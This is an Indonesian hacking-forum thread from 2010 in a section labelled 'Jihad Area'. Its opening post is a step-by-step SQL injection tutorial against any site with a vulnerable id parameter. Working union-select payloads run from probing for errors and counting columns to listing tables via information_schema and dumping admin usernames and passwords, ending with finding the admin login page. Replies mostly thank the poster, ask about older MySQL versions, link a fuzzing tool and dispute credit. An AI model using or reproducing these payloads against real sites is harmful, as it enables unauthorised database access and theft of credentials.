Soldier Of Allah - Indonesia
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Soldier Of Allah adalah Team Pembela Islam
 
IndeksPortalLatest imagesPencarianPendaftaranLogin

Soldier Of Allah - Indonesia :: Jihad Area :: Tutorial
 

 [Tutorial] SQL-injection

Go down 
+19
Ghur4b4
apiedsz88
El-Farhatz
billymoed
LOL1ds
ihin
aldy_182
T-roy
bumble_be
ch3rub1m
misterfribo
demnas
kitt99
abbsolut_sakit_jiwa
Gariz_Keraz
sikat_WC
SyNTaX eRRoR
Neo|g4br1eL
DexteR
23 posters
PengirimMessage
DexteR
Admin
Admin
DexteR


Jumlah posting : 9
Join date : 04.01.10
Age : 36
Lokasi : Indonesia , Palembang

[Tutorial] SQL-injection Empty
PostSubyek: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyWed Jan 06, 2010 1:53 pm
Assallamualaikum Wr Wb

mungkin repost tapi semogaberguna Smile

[size=15]Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
Code:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:
Code:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
Code:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


===========
=step Empat:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :https://soai.indonesianforum.net/ascii-h1.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password

Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Tujuh:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka Smile


======================================
syukron to my friend : Gonzhack selaku owner


Terakhir diubah oleh DexteR tanggal Thu Jul 15, 2010 12:55 pm, total 1 kali diubah
Kembali Ke Atas Go down
Neo|g4br1eL




Jumlah posting : 86
Join date : 07.01.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyThu Jan 07, 2010 12:58 am
saya pelajarin dulu yah kak Smile
Kembali Ke Atas Go down
Tamu
Tamu




[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyThu Jan 07, 2010 1:03 am
Numpang ngambil ilmu , Bismillah
Kembali Ke Atas Go down
SyNTaX eRRoR

SyNTaX eRRoR


Jumlah posting : 28
Join date : 12.01.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyTue Jan 12, 2010 7:02 am
Ikut Belajar yah kk Very Happy
Kembali Ke Atas Go down
sikat_WC




Jumlah posting : 1
Join date : 13.01.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyWed Jan 13, 2010 3:14 am
nyoba belajar ah... Laughing
Kembali Ke Atas Go down
Gariz_Keraz

Gariz_Keraz


Jumlah posting : 120
Join date : 12.01.10
Age : 29
Lokasi : Mojokerto

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyWed Jan 13, 2010 4:27 am
Ane Numpang Ngambil Ilmunya....
Kembali Ke Atas Go down
http://www.afz-devils.co.cc
abbsolut_sakit_jiwa

abbsolut_sakit_jiwa


Jumlah posting : 11
Join date : 12.01.10
Age : 38
Lokasi : HeLL

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyThu Jan 14, 2010 10:35 am
mantep gan...versi 5 banyak yg kecolong heee..klo TIPS sql versi 4 ada gk gan??
kagak ngerti nebak2 V.4 Very Happy

di tunggu tutornya gan
syukron all crew hamba allah
Kembali Ke Atas Go down
kitt99

kitt99


Jumlah posting : 8
Join date : 08.01.10
Lokasi : /home

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyFri Jan 15, 2010 2:27 am
abbsolut_sakit_jiwa wrote:
mantep gan...versi 5 banyak yg kecolong heee..klo TIPS sql versi 4 ada gk gan??
kagak ngerti nebak2 V.4 Very Happy

di tunggu tutornya gan
syukron all crew hamba allah

klo tebak versi 4 pakai schemafuzz aja akhi

http://www.darkc0de.com/others/schemafuzz.py
Kembali Ke Atas Go down
abbsolut_sakit_jiwa

abbsolut_sakit_jiwa


Jumlah posting : 11
Join date : 12.01.10
Age : 38
Lokasi : HeLL

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyFri Jan 15, 2010 5:52 am
kitt99 wrote:
abbsolut_sakit_jiwa wrote:
mantep gan...versi 5 banyak yg kecolong heee..klo TIPS sql versi 4 ada gk gan??
kagak ngerti nebak2 V.4 Very Happy

di tunggu tutornya gan
syukron all crew hamba allah

klo tebak versi 4 pakai schemafuzz aja akhi

http://www.darkc0de.com/others/schemafuzz.py


Ok gan..trus command lwat cmd nya gmana tuh gan?? masih bingung Very Happy
Kembali Ke Atas Go down
demnas

demnas


Jumlah posting : 12
Join date : 15.01.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyFri Jan 15, 2010 11:05 pm
wew....
mAntaf bro... !!!
untuk yang sql versi 4 adagak bro ?
Kembali Ke Atas Go down
misterfribo




Jumlah posting : 8
Join date : 04.01.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyFri Feb 26, 2010 7:48 pm
Creditnya jgan lupa.......!

itu Punya Gonzhack..!
Kembali Ke Atas Go down
ch3rub1m

ch3rub1m


Jumlah posting : 1
Join date : 27.02.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptySat Feb 27, 2010 4:00 am
DExter gw jg ga tau u sengaja ato lupa mencantumkan nama pembuat ne tutorial...yg bisa d liat di http://packetstormsecurity.org/papers/database/mysql-injection.txt
n apa u mau jadi malingsial versi indo????
n then ini "thanks to my friend : OrangBego" maksud u siapa ha???yg kami tau ne tutor pencipta nya cuma satu,yaitu gonzhack Suspect
Kembali Ke Atas Go down
bumble_be




Jumlah posting : 3
Join date : 27.02.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptySat Feb 27, 2010 9:56 am
creditny jgn lp..
Kembali Ke Atas Go down
T-roy

T-roy


Jumlah posting : 4
Join date : 03.05.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyMon May 03, 2010 6:34 am
seppp.
Kembali Ke Atas Go down
aldy_182

aldy_182


Jumlah posting : 2
Join date : 04.05.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyTue May 04, 2010 9:39 am
Nice inpoh om ijin copas yach bounce
Kembali Ke Atas Go down
ihin




Jumlah posting : 1
Join date : 07.05.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyFri May 07, 2010 6:33 pm
numpang sodat ya y KK
Kembali Ke Atas Go down
LOL1ds

LOL1ds


Jumlah posting : 2
Join date : 08.05.10
Lokasi : ./r00t/M0x3Rkru

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptySat May 08, 2010 1:16 pm
Thx kk infonya... Very Happy
Kembali Ke Atas Go down
billymoed

billymoed


Jumlah posting : 4
Join date : 31.01.10
Age : 29

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptySun May 09, 2010 5:38 pm
ikut belajar yah... Smile
Kembali Ke Atas Go down
http://www.billymoed.info
El-Farhatz

El-Farhatz


Jumlah posting : 60
Join date : 20.03.10
Lokasi : Bumi Allah

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyWed May 12, 2010 12:19 am
@atas ,,, merendah aja neh om billi Smile) ,


Terakhir diubah oleh El-Farhatz tanggal Mon Oct 22, 2012 11:31 pm, total 1 kali diubah
Kembali Ke Atas Go down
apiedsz88

apiedsz88


Jumlah posting : 4
Join date : 16.01.10
Age : 35
Lokasi : Malang

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptySat May 22, 2010 6:46 am
hancurkan... !!!!
Kembali Ke Atas Go down
http://cr7-fanyfauzi.blogspot.com
Ghur4b4




Jumlah posting : 15
Join date : 23.06.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyWed Jun 23, 2010 11:17 pm
cheers coba dulu ah
Kembali Ke Atas Go down
SikuruZ




Jumlah posting : 56
Join date : 07.01.10
Age : 30
Lokasi : Sumatra selatan . Lubuklinggau

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyThu Jun 24, 2010 3:00 am
alhamdulillah.
akhir nya dapat juga .
terimakasih akhi dexter Very Happy .
.
Kembali Ke Atas Go down
http://sikuruz.co.tv
chowwank




Jumlah posting : 1
Join date : 18.05.11

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyWed May 18, 2011 8:58 am
syukron atas ilmunya akhi,, Very Happy
Kembali Ke Atas Go down
destroyed




Jumlah posting : 2
Join date : 13.01.10

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptySun Jun 03, 2012 12:48 am
ijim copas
Kembali Ke Atas Go down
DJ-Yuti




Jumlah posting : 1
Join date : 03.07.12

[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection EmptyTue Jul 03, 2012 8:07 am
Gann Minta link download SQL yg 5 donk
Kembali Ke Atas Go down
Sponsored content





[Tutorial] SQL-injection Empty
PostSubyek: Re: [Tutorial] SQL-injection   [Tutorial] SQL-injection Empty
Kembali Ke Atas Go down
 
[Tutorial] SQL-injection
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Darkjumper – scanner to check for SQL injection, LFI and RFI vulnerabilities!
» Python Programming Tutorial
» Tutorial memasukkan script ke dalam gambar
» [Tutorial] MERESET PASSWORD WORDPRESS SECARA PAKSA .

Permissions in this forum:Anda tidak dapat menjawab topik
Soldier Of Allah - Indonesia :: Jihad Area :: Tutorial-
Navigasi: